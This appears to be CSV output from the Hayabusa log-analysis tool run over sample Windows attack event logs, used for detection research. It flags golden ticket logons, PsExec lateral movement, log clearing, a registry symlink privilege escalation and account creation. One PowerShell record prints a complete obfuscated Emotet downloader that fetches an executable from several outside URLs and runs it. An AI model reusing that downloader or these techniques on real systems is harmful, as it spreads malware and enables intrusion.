Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:35.319 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:35.773 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:38:23.185 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-20 15:39:15.820 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-20 
15:41:58.884 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.177 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.177 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.193 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:54.193 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:42:55.188 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP 
Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:04.967 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-20 15:43:36.582 +00:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-25 09:58:51.434 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: 
C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:02:32.697 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:02:32.701 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.690 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.702 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.704 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 
747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.710 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.719 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.763 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.770 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.772 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 
747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.776 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.780 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.787 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.398 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: 
C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.418 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.594 
+00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.610 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.644 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.644 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.677 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 
747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:09:27.981 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:09:27.988 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 
747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-26 05:09:28.845 +00:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 
.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 05:09:28.845 +00:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 05:09:33.504 +00:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-26 05:09:33.504 +00:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-27 11:40:56.397 +00:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.397 +00:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 
+00:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 +00:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 +00:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 11:47:39.499 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 11:47:48.570 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 11:47:48.823 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same 
logonid.evtx +2020-09-02 11:47:48.842 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-04 09:28:22.280 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 09:28:22.280 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 09:28:42.976 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon 